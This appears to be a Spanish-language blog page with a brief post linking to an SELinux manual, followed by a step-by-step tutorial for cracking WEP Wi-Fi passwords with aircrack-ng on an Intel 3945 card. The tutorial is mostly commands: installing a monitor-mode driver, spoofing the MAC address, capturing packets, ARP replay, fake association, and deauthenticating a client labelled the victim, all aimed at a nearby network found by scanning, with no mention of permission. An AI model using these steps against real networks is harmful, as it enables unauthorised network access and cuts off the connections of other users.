Manual SELinux

Buscando información he encontrado un manual muy detallado y bien desarrollado que explica la base/funcionamiento y usos de SELinux.

NSA

Dejo aquí varios links para su descarga así como el de la fuente:

SELinux en la web de NSA

PDF osties.com

PDF Codigo Libre

Fuente

Advertisements

Manual crack WEP passwords con IWL3945 !

Este manual es para crackear redes solo con WEP utilizando una tarjeta wireles Intel Wireless 3945
1-Instalar Driver Monitor

sudo apt-get install build-essential
sudo apt-get install libssl-dev
wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
tar -xjf ipwraw-ng*
cd ipwraw-ng
make
sudo make install
sudo make install_ucode
echo “blacklist ipwraw” | sudo tee /etc/modprobe.d/ipwraw
sudo depmod -ae

Con esto, no solo instalaremos el driver de monitor, sino que deshabilitaremos el autoinicio de este driver cada vez que reiniciemos, con el modo monitor, no te puedes conectar a una red wifi.

Cada vez que queramos encontrar una contraseña WEP tendremos que habilitar este driver, si tenemos que conectarnos a una red, o reiniciamos la maquina, o deshabilitamos el driver monitor.

2-Instalación AirCrack:

wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc2.tar.gz
tar -zxvf aircrack-ng-1.0-rc2.tar.gz
cd aircrack-ng-1.0-rc2
make
make install

Scripts: (Tengo un par de scripts que habilitan/deshabilitan el driver y modifican la MAC con una aleatoria)

Cargar driver:

#!/bin/bash
rmmod iwl3945
modprobe ipwraw
sleep 2
iwconfig wifi0 rate 1M

Descargar driver:

#!/bin/bash
rmmod ipwraw ; modprobe iwl3945

Modificar MAC:

#!/bin/bash
ifconfig wifi0 down
macchanger -r wifi0
ifconfig wifi0 up
macchanger –show wifi0 | grep -v Current

3-Descubrir contraseña WEP:

Habilitamos el modo monitor:

sudo modprobe -r ipw3945
sudo modprobe ipwraw
sudo ifconfig wifi0 up
sudo iwconfig wifi0 rate 1M

Con esto cargamos el driver y configuramos la tarjeta con mayor sensibilidad.

Nota: Los pasos del 1 al 5 los haremos a la vez, con una pantalla de terminal para cada una, ya que necesitamos la información de todas para poder continuar con el siguiente punto.

1-Primero vemos que redes tenemos cerca:

airodump-ng wifi0

Vemos que tenemos solo una red WEP, lo intentaremos con esta. “Jazztel Wireless”

2-Capturamos los paquetes de esta red:

airodump-ng –bssid _MAC_ACCES_POINT_ -b abg -w Fichero_CAB –channel Canal_wifi Interfaz

Ahora ya estamos capturando paquetes. Necesitamos entre 5000 y 10000 paquetes DATA, los Beacons, ni caso.

3-Ataque ARP:

aireplay -3 -b _MAC_ACCES_POINT_ -h NUESTRA_MAC interfaz

4-Asociación falsa

aireplay -1 10 -a _MAC_ACCES_POINT_  -e Nombre_Red_Wifi -h NUESTRA_MAC interfaz

El parametro 10 es la cantidad de veces que lo intentaremos. Ahora ya vemos ver que estamos asociados al AAPP:

(Si hay otra persona conectada, podemos desconectarle, para forzar una nueva conexión y asi crear paquetes ARP.

5-Desasociación de un cliente:

aireplay-ng -0 10 -a _MAC_ACCES_POINT_ -c MAC_PC_VICTIMA wifi0

Veremos que empieza a perder paquetes

6-Cuando ya tenemos mas de 5 o 10 mil paquetes DATA, ya podemos crackear la clave WEP.

aircrack-ng Fichero_CAB

Ya tenemos la cotraseña, nos la muestra en HEX y ASCII, particularmente solo uso la ASCII. Si nos faltan paquetes DATA nos dira que lo intentemos con mas.